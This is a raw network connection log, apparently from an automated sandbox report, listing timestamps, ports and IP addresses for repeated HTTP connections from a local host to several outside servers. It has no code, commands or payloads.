                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164992094 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.165019989 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.556864023 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557074070 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557087898 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557132959 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557178974 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557219982 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557265997 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557265043 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557308912 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557357073 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557373047 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557442904 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557594061 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.871862888 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.871922970 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.871968985 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.872181892 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:58.748754978 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:59.764904976 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.077215910 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.077395916 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.080641031 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.080698967 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.080746889 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.392867088 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.393120050 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.393347979 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395240068 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395479918 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395488977 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395495892 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395515919 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395522118 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395529032 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395534992 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395539999 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395545959 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395570040 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395570040 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395736933 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.707953930 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708003998 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708039045 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708071947 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708106041 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708142996 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708175898 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708210945 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708244085 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708277941 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708276033 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708311081 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708322048 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708347082 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708380938 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708415985 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708446026 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708448887 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708483934 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708518028 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708551884 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708551884 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708585024 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708586931 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708621025 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708657026 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708709002 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708741903 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708880901 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:01.591938972 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:02.607949018 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:02.923280001 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:02.923485994 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:02.925647974 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.240819931 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241132975 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241188049 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241234064 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241367102 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241431952 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241492987 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241508007 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241548061 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241553068 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241599083 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241642952 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241667986 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241686106 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241801977 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241863966 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557071924 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557118893 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557157040 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557342052 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557446003 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557518005 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:34.356601954 CET804982284.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:36.662977934 CET4982380192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:36.874931097 CET804982384.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:36.875118017 CET4982380192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:36.878411055 CET4982380192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:36.878499985 CET4982380192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:37.091747046 CET804982384.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:37.091793060 CET804982384.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:37.091821909 CET804982384.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.396708012 CET4982480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.608505011 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.608696938 CET4982480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.610806942 CET4982480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.822561026 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.822619915 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.822767019 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823002100 CET4982480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823132038 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823187113 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823283911 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823329926 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823370934 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823402882 CET4982480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823415041 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823448896 CET4982480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823709965 CET4982480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.824234962 CET4982480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:40.035593033 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:44.833106041 CET4982580192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:45.000514030 CET8049825209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:45.000700951 CET4982580192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:45.003871918 CET4982580192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:45.171607018 CET8049825209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:45.176934958 CET8049825209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:45.176980972 CET8049825209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:45.177140951 CET4982580192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:46.519505024 CET4982580192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.535641909 CET4982680192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.702790022 CET8049826209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.702953100 CET4982680192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.706141949 CET4982680192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.872929096 CET8049826209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.878542900 CET8049826209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.878653049 CET8049826209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.878777981 CET4982680192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:49.222039938 CET4982680192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.238184929 CET4982780192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.406819105 CET8049827209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.406992912 CET4982780192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.410233021 CET4982780192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.410320044 CET4982780192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.580223083 CET8049827209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.580251932 CET8049827209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.586595058 CET8049827209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.586616039 CET8049827209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.586735010 CET4982780192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:51.924588919 CET4982780192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:52.940596104 CET4982880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.107837915 CET8049828209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.108000040 CET4982880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.110161066 CET4982880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.277251959 CET8049828209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.283241034 CET8049828209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.283286095 CET8049828209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.283541918 CET4982880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.284126043 CET4982880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.451425076 CET8049828209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:58.298877001 CET4982980192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:55:58.436660051 CET8049829208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:58.436841011 CET4982980192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:55:58.440012932 CET4982980192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:55:58.577776909 CET8049829208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:00.970118046 CET4983080192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:01.108063936 CET8049830208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:01.108262062 CET4983080192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:01.111413956 CET4983080192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:01.249275923 CET8049830208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:03.641581059 CET4983180192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:03.779141903 CET8049831208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:03.779318094 CET4983180192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:03.782567978 CET4983180192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:03.782618046 CET4983180192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:03.920289993 CET8049831208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:06.314286947 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:06.451843023 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:06.452027082 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:06.454502106 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:06.598073959 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112541914 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112596035 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112642050 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112684011 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112705946 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112725973 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112768888 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112812996 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:35.326009035 CET80498408.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:35.326266050 CET80498408.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:35.326313019 CET80498408.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:35.326607943 CET4984080192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:35.327233076 CET4984080192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:36.164278030 CET4984080192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:36.502953053 CET80498408.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.336764097 CET4984180192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.656936884 CET804984138.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.657093048 CET4984180192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.660944939 CET4984180192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.981147051 CET804984138.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.981194019 CET804984138.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.981225014 CET804984138.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.981354952 CET4984180192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:42.163522005 CET4984180192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.180058956 CET4984280192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.498960972 CET804984238.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.499139071 CET4984280192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.502299070 CET4984280192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.821250916 CET804984238.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.821299076 CET804984238.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.821482897 CET804984238.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.821641922 CET4984280192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:45.006707907 CET4984280192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.023292065 CET4984380192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.342772007 CET804984338.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.342953920 CET4984380192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.346246958 CET4984380192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.346308947 CET4984380192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.665939093 CET804984338.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.666198969 CET804984338.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.666241884 CET804984338.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.666378021 CET804984338.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.666630983 CET804984338.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.666673899 CET804984338.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.666769028 CET4984380192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:47.849757910 CET4984380192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:48.866260052 CET4984480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.185872078 CET804984438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.186065912 CET4984480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.188229084 CET4984480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.507728100 CET804984438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.507761955 CET804984438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.507767916 CET804984438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.508112907 CET4984480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.508713007 CET4984480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.827971935 CET804984438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.521116018 CET4984580192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.689189911 CET8049845103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.689363956 CET4984580192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.692557096 CET4984580192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.891254902 CET8049845103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.891293049 CET8049845103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.891535044 CET4984580192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:56.207379103 CET4984580192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.223460913 CET4984680192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.391311884 CET8049846103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.391480923 CET4984680192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.395035982 CET4984680192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.592434883 CET8049846103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.592483044 CET8049846103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.592624903 CET4984680192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:58.909833908 CET4984680192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:59.925992966 CET4984780192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.094000101 CET8049847103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.094227076 CET4984780192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.097472906 CET4984780192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.097537041 CET4984780192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.097579002 CET4984780192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.273761034 CET8049847103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.284235001 CET8049847103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.284281015 CET8049847103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.284482002 CET4984780192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:01.612488985 CET4984780192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.628448963 CET4984880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.796622992 CET8049848103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.796772003 CET4984880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.798958063 CET4984880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.993597984 CET8049848103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.993669033 CET8049848103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.993702888 CET8049848103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.993916035 CET4984880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.994559050 CET4984880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:03.162591934 CET8049848103.224.182.242192.168.11.20
Timestamp    Source Port    Dest Port    Source IP    Dest IP
